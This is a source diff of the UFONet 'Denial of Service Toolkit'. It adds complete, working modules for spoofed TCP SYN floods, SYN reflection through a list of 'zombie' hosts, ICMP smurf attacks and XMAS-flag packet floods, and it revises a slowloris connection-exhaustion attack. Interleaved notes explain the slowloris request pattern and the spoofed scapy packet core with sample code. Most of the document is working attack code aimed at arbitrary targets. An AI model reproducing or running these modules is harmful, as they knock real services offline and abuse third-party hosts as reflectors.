-            try: 
+    try:
+        for i in range(requests): 
+            n=n+1
+            try:
                 sock, ip = setupSocket(self, ip)
-            except socket.error:
-                self.sockets.remove(sock)
-        for i in range(requests - len(self.sockets)):
-            print("[Info] LORIS: Re-opening closed 'tractor beam' -> Status: RE-LINKED!")
-            sock, ip = setupSocket(self, ip)
-            if sock:
-                self.sockets.append(sock)
+                print "[Info] [AI] [LORIS] Firing 'tractor beam' ["+str(n)+"] -> [CONNECTED!]"
+            except:
+                print "[Error] [AI] [LORIS] Failed to engage with 'tractor beam' ["+str(n)+"]"
+            self.sockets.append(sock)
+        while True: # try to abuse HTTP Headers
+            for sock in list(self.sockets):
+                try: 
+                    sock, ip = setupSocket(self, ip)
+                except socket.error:
+                    self.sockets.remove(sock)
+            for i in range(requests - len(self.sockets)):
+                print("[Info] [AI] [LORIS] Re-opening closed 'tractor beam' -> [RE-LINKED!]")
+                sock, ip = setupSocket(self, ip)
+                if sock:
+                    self.sockets.append(sock)
+    except:
+        print("[Error] [AI] [LORIS] Failing to engage... -> Is still target online? -> [Checking!]")
 
 class LORIS(object):
     def __init__(self):
@@ -77,9 +92,18 @@ class LORIS(object):
         self.methods = ['GET', 'POST', 'X-METHOD'] # supported HTTP requests methods
 
     def attacking(self, target, requests):
-        print "\n[Info] Slow HTTP requests (LORIS) is ready to fire: [" , requests, "tractor beams ]\n"
+        print "\n[Info] [AI] Slow HTTP requests (LORIS) is ready to fire: [" , requests, "tractor beams ]\n"
         try:
             ip = socket.gethostbyname(target)
         except:
-            ip = target
+            try:
+                import dns.resolver
+                r = dns.resolver.Resolver()
+                r.nameservers = ['8.8.8.8', '8.8.4.4'] # google DNS resolvers
+                url = urlparse(target)
+                a = r.query(url.netloc, "A") # A record
+                for rd in a:
+                    ip = str(rd)
+            except:
+                ip = target
         tractor(self, ip, requests) # attack with LORIS using threading
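
  The LORIS hunks above only show the socket pool being opened and re-opened; the request construction happens inside setupSocket(), most of which is unchanged and therefore not visible here. As a point of reference only, a generic slowloris-style keep-alive looks roughly like this (illustrative, not UFONet's exact code):

    import socket, time

    def slow_socket(ip, port=80):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(4)
        s.connect((ip, port))
        s.send("GET /?%d HTTP/1.1\r\n" % int(time.time()))  # request line only
        s.send("Host: %s\r\n" % ip)                          # headers left unfinished
        return s

    def keep_alive(socks):
        for s in socks:
            s.send("X-a: %d\r\n" % int(time.time()))         # dribble one partial header per pass
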

+ 111 - 0
core/mods/smurf.py

@@ -0,0 +1,111 @@
+#!/usr/bin/env python 
+# -*- coding: utf-8 -*-"
+"""
+UFONet - Denial of Service Toolkit - 2018 - by psy (epsylon@riseup.net)
+
+You should have received a copy of the GNU General Public License along
+with UFONet; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+import sys, random, socket, time
+from urlparse import urlparse
+
+try:
+    from scapy.all import *
+except:
+    print "\nError importing: scapy lib. \n\n To install it on Debian based systems:\n\n $ 'sudo apt-get install python-scapy' or 'pip install scapy'\n"
+    sys.exit(2)
+
+# UFONet ICMP broadcast attack (SMURF)
+def randInt():
+    x = random.randint(1,65535) # TCP ports
+    return x
+
+def sIP(base_stations): # extract 'base stations'
+    bs = {}
+    s_zombie = random.choice(base_stations).strip() # randomly pick a 'base station'
+    if not s_zombie in bs:
+        try:
+            s_zombie_ip = socket.gethostbyname(s_zombie)
+            bs[s_zombie] = s_zombie_ip # add to dict of resolved domains
+        except:
+            try:
+                import dns.resolver
+                r = dns.resolver.Resolver()
+                r.nameservers = ['8.8.8.8', '8.8.4.4'] # google DNS resolvers
+                url = urlparse(s_zombie)
+                a = r.query(url.netloc, "A") # A record
+                for rd in a:
+                    s_zombie_ip = str(rd)
+                bs[s_zombie] = s_zombie_ip # add to dict of resolved domains
+            except:
+                s_zombie_ip = s_zombie
+    else:
+        s_zombie_ip = bs.get(s_zombie)
+    return s_zombie_ip
+
+def smurfize(ip, sport, rounds):
+    f = open('botnet/zombies.txt') # use 'zombies' as 'base stations'
+    base_stations = f.readlines()
+    base_stations = [ base_station.replace('\n','') for base_station in base_stations ]
+    f.close()
+    n=0
+    try:
+        for x in range (0,int(rounds)):
+            n=n+1
+            s_zombie_ip = sIP(base_stations)
+            if s_zombie_ip == None: # no 'base stations' available
+                print "[Error] [AI] [SMURF] Impossible to retrieve 'base stations' -> [Aborting!]\n"
+                break
+            seq = randInt()
+            window = randInt()
+            IP_p = IP()
+            try:
+                IP_p.src = ip # ICMP 'broadcast' packet carrying a fraudulent (spoofed) source IP belonging to the target (aka SMURF attack)
+            except:
+                print "[Error] [AI] [SMURF] Imposible to resolve IP from target! -> [Aborting!]\n"
+                break
+            try:
+                IP_p.dst = s_zombie_ip
+            except:
+                print "[Error] [AI] [SMURF] Imposible to resolve IP from 'base station' -> [Aborting!]\n"
+                break
+            TCP_l = TCP()
+            TCP_l.sport = sport
+            TCP_l.dport = sport
+            TCP_l.seq = seq
+            TCP_l.window = window
+            try:
+                send(IP_p/ICMP(), verbose=0)
+                print "[Info] [AI] [SMURF] Redirecting 'base station' ["+str(n)+"] ["+str(s_zombie_ip)+"] -> [RE-FLUXING!]"
+                time.sleep(1) # sleep time required for balanced success
+            except:
+                print "[Error] [AI] [SMURF] Failed to redirect 'base station' ["+str(n)+"] ["+str(s_zombie_ip)+"]"
+    except:
+        print("[Error] [AI] [SMURF] Failing to engage... -> Is still target online? -> [Checking!]")
+
+class SMURF(object):
+    def attacking(self, target, rounds):
+        print "[Info] [AI] ICMP Broadcast (SMURF) is redirecting: [" , rounds, "base stations ]\n"
+        if target.startswith('http://'):
+            target = target.replace('http://','')
+            sport = 80
+        elif target.startswith('https://'):
+            target = target.replace('https://','')
+            sport = 443
+        try:
+            ip = socket.gethostbyname(target)
+        except:
+            try:
+                import dns.resolver
+                r = dns.resolver.Resolver()
+                r.nameservers = ['8.8.8.8', '8.8.4.4'] # google DNS resolvers
+                url = urlparse(target)
+                a = r.query(url.netloc, "A") # A record
+                for rd in a:
+                    ip = str(rd)
+            except:
+                ip = target
+        if ip == "127.0.0.1" or ip == "localhost":
+            print "[Info] [AI] [SMURF] Sending message '1/0 %====D 2 Ur ;-0' to 'localhost' -> [OK!]\n"
+            return
+        smurfize(ip, sport, rounds) # attack with SMURF using threading

+ 116 - 0
core/mods/spray.py

@@ -0,0 +1,116 @@
+#!/usr/bin/env python 
+# -*- coding: utf-8 -*-"
+"""
+UFONet - Denial of Service Toolkit - 2018 - by psy (epsylon@riseup.net)
+
+You should have received a copy of the GNU General Public License along
+with UFONet; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+import sys, random, socket, time
+from urlparse import urlparse
+
+try:
+    from scapy.all import *
+except:
+    print "\nError importing: scapy lib. \n\n To install it on Debian based systems:\n\n $ 'sudo apt-get install python-scapy' or 'pip install scapy'\n"
+    sys.exit(2)
+
+# UFONet TCP SYN Reflector (SPRAY)
+def randInt():
+    x = random.randint(1,65535) # TCP ports
+    return x
+
+def sIP(base_stations): # extract 'base stations'
+    bs = {}
+    s_zombie = random.choice(base_stations).strip() # randomly pick a 'base station'
+    if not s_zombie in bs:
+        try:
+            s_zombie_ip = socket.gethostbyname(s_zombie)
+            bs[s_zombie] = s_zombie_ip # add to dict of resolved domains
+        except:
+            try:
+                import dns.resolver
+                r = dns.resolver.Resolver()
+                r.nameservers = ['8.8.8.8', '8.8.4.4'] # google DNS resolvers
+                url = urlparse(s_zombie)
+                a = r.query(url.netloc, "A") # A record
+                for rd in a:
+                    s_zombie_ip = str(rd)
+                bs[s_zombie] = s_zombie_ip # add to dict of resolved domains
+            except:
+                s_zombie_ip = s_zombie
+    else:
+        s_zombie_ip = bs.get(s_zombie)
+    return s_zombie_ip
+
+def sprayize(ip, sport, rounds):
+    f = open('botnet/zombies.txt') # use 'zombies' as 'base stations'
+    base_stations = f.readlines()
+    base_stations = [ base_station.replace('\n','') for base_station in base_stations ]
+    f.close()
+    n=0
+    try:
+        for x in range (0,int(rounds)):
+            n=n+1
+            s_zombie_ip = sIP(base_stations)
+            if s_zombie_ip == None: # no 'base stations' available
+                print "[Error] [AI] [SPRAY] Impossible to retrieve 'base stations' -> [Aborting!]\n"
+                break
+            seq = randInt()
+            window = randInt()
+            IP_p = IP()
+            try:
+                IP_p.src = ip # SYN packets carrying a fraudulent (spoofed) source IP belonging to the target (aka DrDoS)
+            except:
+                print "[Error] [AI] [SPRAY] Imposible to resolve IP from 'target' -> [Aborting!]\n"
+                break
+            try:
+                IP_p.dst = s_zombie_ip
+            except:
+                print "[Error] [AI] [SPRAY] Imposible to resolve IP from 'base station' -> [Aborting!]\n"
+                break
+            TCP_l = TCP()
+            TCP_l.sport = sport
+            TCP_l.dport = sport
+            TCP_l.seq = seq
+            TCP_l.window = window
+            TCP_l.flags = "S" # SYN
+            SYNACK=(IP_p/TCP_l)
+            TCP_l.flags = "A" # ACK
+            TCP_l.seq = SYNACK.ack+1
+            TCP_l.ack = SYNACK.seq+1
+            try:
+                send(IP_p/TCP_l, verbose=0)
+                print "[Info] [AI] [SPRAY] Redirecting 'base station' ["+str(n)+"] ["+str(s_zombie_ip)+"] -> [RE-FLUXING!]"
+                time.sleep(1) # sleep time required for balanced success
+            except:
+                print "[Error] [AI] [SPRAY] Failed to redirect 'base station' ["+str(n)+"] ["+str(s_zombie_ip)+"]"
+    except:
+        print("[Error] [AI] [SPRAY] Failing to engage... -> Is still target online? -> [Checking!]")
+
+class SPRAY(object):
+    def attacking(self, target, rounds):
+        print "[Info] [AI] TCP SYN Reflector (SPRAY) is redirecting: [" , rounds, "base stations ]\n"
+        if target.startswith('http://'):
+            target = target.replace('http://','')
+            sport = 80
+        elif target.startswith('https://'):
+            target = target.replace('https://','')
+            sport = 443
+        try:
+            ip = socket.gethostbyname(target)
+        except:
+            try:
+                import dns.resolver
+                r = dns.resolver.Resolver()
+                r.nameservers = ['8.8.8.8', '8.8.4.4'] # google DNS resolvers
+                url = urlparse(target)
+                a = r.query(url.netloc, "A") # A record
+                for rd in a:
+                    ip = str(rd)
+            except:
+                ip = target
+        if ip == "127.0.0.1" or ip == "localhost":
+            print "[Info] [AI] [SPRAY] Sending message '1/0 %====D 2 Ur ;-0' to 'localhost' -> [OK!]\n"
+            return
+        sprayize(ip, sport, rounds) # attack with SPRAY using threading

+ 82 - 0
core/mods/ufosyn.py

@@ -0,0 +1,82 @@
+#!/usr/bin/env python 
+# -*- coding: utf-8 -*-"
+"""
+UFONet - Denial of Service Toolkit - 2018 - by psy (epsylon@riseup.net)
+
+You should have received a copy of the GNU General Public License along
+with UFONet; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+import sys, random, socket, time
+from urlparse import urlparse
+
+try:
+    from scapy.all import *
+except:
+    print "\nError importing: scapy lib. \n\n To install it on Debian based systems:\n\n $ 'sudo apt-get install python-scapy' or 'pip install scapy'\n"
+    sys.exit(2)
+
+# UFONet TCP SYN Flooder (UFOSYN)
+def randIP():
+    ip = ".".join(map(str, (random.randint(0,255)for _ in range(4))))
+    return ip
+
+def randInt():
+    x = random.randint(1,65535) # TCP ports
+    return x	
+
+def synize(ip, port, rounds):
+    n=0
+    try:
+        for x in range (0,int(rounds)):
+            n=n+1
+            sport = randInt()
+            seq = randInt()
+            window = randInt()
+            IP_p = IP()
+            IP_p.src = randIP()
+            try:
+                IP_p.dst = ip
+            except:
+                print "[Error] [AI] [UFOSYN] Imposible to resolve IP from target -> [Aborting!]\n"
+                break
+            TCP_l = TCP()	
+            TCP_l.sport = sport
+            TCP_l.dport = port
+            TCP_l.flags = "S" # SYN
+            TCP_l.seq = seq
+            TCP_l.window = window
+            try:
+                send(IP_p/TCP_l, verbose=0)
+                print "[Info] [AI] [UFOSYN] Firing 'quantum hook' ["+str(n)+"] -> [FLOODING!]"
+                time.sleep(1) # sleep time required for balanced success
+            except:
+                print "[Error] [AI] [UFOSYN] Failed to engage with 'quantum hook' ["+str(n)+"]"
+    except:
+        print("[Error] [AI] [UFOSYN] Failing to engage... -> Is still target online? -> [Checking!]")
+
+class UFOSYN(object):
+    def attacking(self, target, rounds):
+        print "[Info] [AI] TCP SYN Flooder (UFOSYN) is ready to fire: [" , rounds, "quantum hooks ]\n"
+        if target.startswith('http://'):
+            target = target.replace('http://','')
+            port = 80
+        elif target.startswith('https://'):
+            target = target.replace('https://','')
+            port = 443
+        try:
+            ip = socket.gethostbyname(target)
+        except:
+            try:
+                import dns.resolver
+                r = dns.resolver.Resolver()
+                r.nameservers = ['8.8.8.8', '8.8.4.4'] # google DNS resolvers
+                url = urlparse(target)
+                a = r.query(url.netloc, "A") # A record
+                for rd in a:
+                    ip = str(rd)
+            except:
+                ip = target
+        if ip == "127.0.0.1" or ip == "localhost":
+            print "[Info] [AI] [UFOSYN] Sending message '1/0 %====D 2 Ur ;-0' to 'localhost' -> [OK!]\n"
+            return
+        synize(ip, port, rounds) # attack with UFOSYN using threading

+ 82 - 0
core/mods/xmas.py

@@ -0,0 +1,82 @@
+#!/usr/bin/env python 
+# -*- coding: utf-8 -*-"
+"""
+UFONet - Denial of Service Toolkit - 2018 - by psy (epsylon@riseup.net)
+
+You should have received a copy of the GNU General Public License along
+with UFONet; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+import sys, random, socket, time
+from urlparse import urlparse
+
+try:
+    from scapy.all import *
+except:
+    print "\nError importing: scapy lib. \n\n To install it on Debian based systems:\n\n $ 'sudo apt-get install python-scapy' or 'pip install scapy'\n"
+    sys.exit(2)
+
+# UFONet TCP 'Christmas Tree' packet attack (XMAS)
+def randIP():
+    ip = ".".join(map(str, (random.randint(0,255)for _ in range(4))))
+    return ip
+
+def randInt():
+    x = random.randint(1,65535) # TCP ports
+    return x
+
+def xmasize(ip, sport, rounds):
+    n=0
+    try:
+        for x in range (0,int(rounds)):
+            n=n+1
+            s_zombie_port = randInt() 
+            seq = randInt()
+            window = randInt()
+            IP_p = IP()
+            IP_p.src = randIP()
+            try:
+                IP_p.dst = ip
+            except:
+                print "[Error] [AI] [XMAS] Imposible to resolve IP from 'target' -> [Aborting!]\n"
+                break
+            TCP_l = TCP()
+            TCP_l.sport = s_zombie_port
+            TCP_l.dport = sport
+            TCP_l.seq = seq
+            TCP_l.window = window
+            TCP_l.flags = "UFP" # ALL FLAGS SET (like a XMAS tree)
+            try:
+                send(IP_p/TCP_l, verbose=0)
+                print "[Info] [AI] [XMAS] Firing 'ionized quartz' ["+str(n)+"] -> [IONIZING!]"
+                time.sleep(1) # sleep time required for balanced success
+            except:
+                print "[Error] [AI] [XMAS] Failed to engage with 'ionized quartz' ["+str(n)+"]"
+    except:
+        print("[Error] [AI] [XMAS] Failing to engage... -> Is still target online? -> [Checking!]")
+
+class XMAS(object):
+    def attacking(self, target, rounds):
+        print "[Info] [AI] TCP 'Christmas Tree' (XMAS) is ready to fire: [" , rounds, "ionized quartzs ]\n"
+        if target.startswith('http://'):
+            target = target.replace('http://','')
+            sport = 80
+        elif target.startswith('https://'):
+            target = target.replace('https://','')
+            sport = 443
+        try:
+            ip = socket.gethostbyname(target)
+        except:
+            try:
+                import dns.resolver
+                r = dns.resolver.Resolver()
+                r.nameservers = ['8.8.8.8', '8.8.4.4'] # google DNS resolvers
+                url = urlparse(target)
+                a = r.query(url.netloc, "A") # A record
+                for rd in a:
+                    ip = str(rd)
+            except:
+                ip = target
+        if ip == "127.0.0.1" or ip == "localhost":
+            print "[Info] [AI] [XMAS] Sending message '1/0 %====D 2 Ur ;-0' to 'localhost' -> [OK!]\n"
+            return
+        xmasize(ip, sport, rounds) # attack with XMAS using threading
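
  UFOSYN, SPRAY, SMURF and XMAS above all share the same scapy core: build an IP() layer carrying a spoofed source address, stack a TCP() or ICMP() layer on top, and send() it at layer 3, one packet per round (raw sockets require root privileges). A condensed sketch of that shared core, with illustrative addresses:

    import random
    from scapy.all import IP, TCP, send

    pkt = IP(src="198.51.100.23", dst="203.0.113.7")      # spoofed source address
    syn = TCP(sport=random.randint(1, 65535), dport=80,
              flags="S", seq=random.randint(1, 65535),
              window=random.randint(1, 65535))            # UFOSYN-style SYN segment
    send(pkt / syn, verbose=0)                            # layer-3 send, needs root
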

File diff suppressed because it is too large
+ 42 - 30
core/options.py


+ 9 - 0
core/tools/__init__.py

@@ -0,0 +1,9 @@
+#!/usr/bin/env python 
+# -*- coding: utf-8 -*-"
+"""
+UFONet - Denial of Service Toolkit - 2018 - by psy (epsylon@riseup.net)
+
+You should have received a copy of the GNU General Public License along
+with UFONet; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""

+ 21 - 9
core/abductor.py

@@ -1,7 +1,7 @@
 #!/usr/bin/env python 
 # -*- coding: utf-8 -*-"
 """
-UFONet - DDoS Botnet via Web Abuse - 2017 - by psy (epsylon@riseup.net)
+UFONet - Denial of Service Toolkit - 2017/2018 - by psy (epsylon@riseup.net)
 
 You should have received a copy of the GNU General Public License along
 with UFONet; if not, write to the Free Software Foundation, Inc., 51
@@ -37,7 +37,7 @@ class Abductor(object):
             if self.ufonet.options.proxy: # set proxy
                 self.proxy_transport(self.ufonet.options.proxy)
                 self.start = time.time()
-                target_reply = urllib2.urlopen(req).read()
+                target_reply = urllib2.urlopen(req, context=self.ctx).read()
                 header = urllib2.urlopen(req).info()
                 self.stop = time.time()
             else:
@@ -46,8 +46,8 @@ class Abductor(object):
                 header = urllib2.urlopen(req).info()
                 self.stop = time.time()
         except: 
-            print('[Error] - Unable to connect...\n')
-            return #sys.exit(2)
+            print('[Error] [AI] Unable to connect -> [Exiting!]\n')
+            return
         return target_reply, header
 
     def convert_size(self, size):
@@ -100,7 +100,7 @@ class Abductor(object):
             req = urllib2.Request(target, None, headers)
             if self.ufonet.options.proxy: # set proxy
                 self.proxy_transport(self.ufonet.options.proxy)
-                target_reply = urllib2.urlopen(req).read()
+                target_reply = urllib2.urlopen(req, context=self.ctx).read()
             else:
                 target_reply = urllib2.urlopen(req, context=self.ctx).read()
         except: 
@@ -139,10 +139,10 @@ class Abductor(object):
         try:
             target_reply, header = self.establish_connection(target)
         except:
-            print "[Error] - Something wrong connecting to your target. Aborting...\n"
+            print "[Error] [AI] Something wrong connecting to your target -> [Aborting!]\n"
             return #sys.exit(2)
         if not target_reply:
-            print "[Error] - Something wrong connecting to your target. Aborting...\n"
+            print "[Error] [AI] Something wrong connecting to your target -> [Aborting!]\n"
             return #sys.exit(2)
         print ' -Target URL:', target, "\n"
         try:
@@ -162,7 +162,19 @@ class Abductor(object):
         try:       
             ipv4 = socket.gethostbyname(domain)
         except:
-            ipv4 = "OFF"
+            try: # extra resolver plan extracted from Orb (https://orb.03c8.net/) [24/12/2018 -> OK!]
+                import dns.resolver
+                r = dns.resolver.Resolver()
+                r.nameservers = ['8.8.8.8', '8.8.4.4'] # google DNS resolvers
+                url = urlparse(domain)
+                a = r.query(url.netloc, "A") # A record
+                for rd in a:
+                    ipv4 = str(rd)
+            except:
+                ipv4 = "OFF"
         try:
             ipv6 = socket.getaddrinfo(domain, port, socket.AF_INET6)
             ftpca = ipv6[0]
@@ -223,4 +235,4 @@ class Abductor(object):
                 print '\n---------'
             except:
                 pass
-        print "\n[Info] Abduction finished... ;-)\n"
+        print "\n[Info] [AI] Abduction finished! -> [OK!]\n"

+ 66 - 66
core/inspector.py

@@ -1,7 +1,7 @@
 #!/usr/bin/env python 
 # -*- coding: utf-8 -*-"
 """
-UFONet - Denial of Service Toolkit - 2013/2014/2015/2016/2017/2018 - by psy (epsylon@riseup.net)
+UFONet - Denial of Service Toolkit - 2013/2018 - by psy (epsylon@riseup.net)
 
 You should have received a copy of the GNU General Public License along
 with UFONet; if not, write to the Free Software Foundation, Inc., 51
@@ -57,13 +57,13 @@ class Inspector(object):
             if self.ufonet.options.proxy: # set proxy
                 self.proxy_transport(self.ufonet.options.proxy)
                 req = urllib2.Request(target, None, headers)
-                target_reply = urllib2.urlopen(req).read()
+                target_reply = urllib2.urlopen(req, context=self.ctx).read()
             else:
                 req = urllib2.Request(target, None, headers)
                 target_reply = urllib2.urlopen(req, context=self.ctx).read()
         except: 
-            print('[Error] - Unable to connect to target\n')
-            return #sys.exit(2)
+            print('[Error] [AI] Unable to connect to target -> [Exiting!]\n')
+            return
         try: # search for image files
             regex_img = []
             regex_img1 = "<img src='(.+?)'" # search on target's results using regex with simple quotation
@@ -87,7 +87,7 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url, None, headers)
-                            img_file = urllib2.urlopen(req).read()
+                            img_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url, None, headers)
                             img_file = urllib2.urlopen(req, context=self.ctx).read()
@@ -99,13 +99,13 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url + img, None, headers)
-                            img_file = urllib2.urlopen(req).read()
+                            img_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url + img, None, headers)
                             img_file = urllib2.urlopen(req, context=self.ctx).read()
                     size = len(img_file)
                 except: 
-                    print('[Error] - Unable to retrieve info from Image')
+                    print('[Error] [AI] Unable to retrieve info from Image -> [Discarding!]')
                     size = 0
                 imgs[img] = int(size)
                 print('(Size: ' + str(size) + ' Bytes)')
@@ -134,7 +134,7 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url, None, headers)
-                            mov_file = urllib2.urlopen(req).read()
+                            mov_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url, None, headers)
                             mov_file = urllib2.urlopen(req, context=self.ctx).read()
@@ -146,13 +146,13 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url + mov, None, headers)
-                            mov_file = urllib2.urlopen(req).read()
+                            mov_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url + mov, None, headers)
                             mov_file = urllib2.urlopen(req, context=self.ctx).read()
                     size = len(mov_file)
                 except: 
-                    print('[Error] - Unable to retrieve info from Video')
+                    print('[Error] [AI] Unable to retrieve info from Video -> [Discarding!]')
                     size = 0
                 movs[mov] = int(size)
                 print('(Size: ' + str(size) + ' Bytes)')
@@ -181,7 +181,7 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url, None, headers)
-                            webm_file = urllib2.urlopen(req).read()
+                            webm_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url, None, headers)
                             webm_file = urllib2.urlopen(req, context=self.ctx).read()
@@ -193,13 +193,13 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url + webm, None, headers)
-                            webm_file = urllib2.urlopen(req).read()
+                            webm_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url + webm, None, headers)
                             webm_file = urllib2.urlopen(req, context=self.ctx).read()
                     size = len(webm_file)
                 except: 
-                    print('[Error] - Unable to retrieve info from Video')
+                    print('[Error] [AI] Unable to retrieve info from Video -> [Discarding!]')
                     size = 0
                 webms[webm] = int(size)
                 print('(Size: ' + str(size) + ' Bytes)')
@@ -228,7 +228,7 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url, None, headers)
-                            avi_file = urllib2.urlopen(req).read()
+                            avi_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url, None, headers)
                             avi_file = urllib2.urlopen(req, context=self.ctx).read()
@@ -240,13 +240,13 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url + avi, None, headers)
-                            avi_file = urllib2.urlopen(req).read()
+                            avi_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url + avi, None, headers)
                             avi_file = urllib2.urlopen(req, context=self.ctx).read()
                     size = len(avi_file)
                 except: 
-                    print('[Error] - Unable to retrieve info from Video')
+                    print('[Error] [AI] Unable to retrieve info from Video -> [Discarding!]')
                     size = 0
                 avis[avi] = int(size)
                 print('(Size: ' + str(size) + ' Bytes)')
@@ -275,7 +275,7 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url, None, headers)
-                            swf_file = urllib2.urlopen(req).read()
+                            swf_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url, None, headers)
                             swf_file = urllib2.urlopen(req, context=self.ctx).read()
@@ -287,13 +287,13 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url + swf, None, headers)
-                            swf_file = urllib2.urlopen(req).read()
+                            swf_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url + swf, None, headers)
                             swf_file = urllib2.urlopen(req, context=self.ctx).read()
                     size = len(swf_file)
                 except: 
-                    print('[Error] - Unable to retrieve info from Flash')
+                    print('[Error] [AI] Unable to retrieve info from Flash -> [Discarding!]')
                     size = 0
                 swfs[swf] = int(size)
                 print('(Size: ' + str(size) + ' Bytes)')
@@ -322,7 +322,7 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url, None, headers)
-                            mpg_file = urllib2.urlopen(req).read()
+                            mpg_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url, None, headers)
                             mpg_file = urllib2.urlopen(req, context=self.ctx).read()
@@ -334,13 +334,13 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url + mpg, None, headers)
-                            mpg_file = urllib2.urlopen(req).read()
+                            mpg_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url + mpg, None, headers)
                             mpg_file = urllib2.urlopen(req, context=self.ctx).read()
                     size = len(mpg_file)
                 except: 
-                    print('[Error] - Unable to retrieve info from Video')
+                    print('[Error] [AI] Unable to retrieve info from Video -> [Discarding!]')
                     size = 0
                 mpgs[mpg] = int(size)
                 print('(Size: ' + str(size) + ' Bytes)')
@@ -369,7 +369,7 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url, None, headers)
-                            mpeg_file = urllib2.urlopen(req).read()
+                            mpeg_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url, None, headers)
                             mpeg_file = urllib2.urlopen(req, context=self.ctx).read()
@@ -381,13 +381,13 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url + mpeg, None, headers)
-                            mpeg_file = urllib2.urlopen(req).read()
+                            mpeg_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url + mpeg, None, headers)
                             mpeg_file = urllib2.urlopen(req, context=self.ctx).read()
                     size = len(mpeg_file)
                 except: 
-                    print('[Error] - Unable to retrieve info from Video')
+                    print('[Error] [AI] Unable to retrieve info from Video -> [Discarding!]')
                     size = 0
                 mpegs[mpeg] = int(size)
                 print('(Size: ' + str(size) + ' Bytes)')
@@ -416,7 +416,7 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url, None, headers)
-                            mp3_file = urllib2.urlopen(req).read()
+                            mp3_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url, None, headers)
                             mp3_file = urllib2.urlopen(req, context=self.ctx).read()
@@ -428,13 +428,13 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url + mp3, None, headers)
-                            mp3_file = urllib2.urlopen(req).read()
+                            mp3_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url + mp3, None, headers)
                             mp3_file = urllib2.urlopen(req, context=self.ctx).read()
                     size = len(mp3_file)
                 except: 
-                    print('[Error] - Unable to retrieve info from Audio')
+                    print('[Error] [AI] Unable to retrieve info from Audio -> [Discarding!]')
                     size = 0
                 mp3s[mp3] = int(size)
                 print('(Size: ' + str(size) + ' Bytes)')
@@ -463,7 +463,7 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url, None, headers)
-                            mp4_file = urllib2.urlopen(req).read()
+                            mp4_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url, None, headers)
                             mp4_file = urllib2.urlopen(req, context=self.ctx).read()
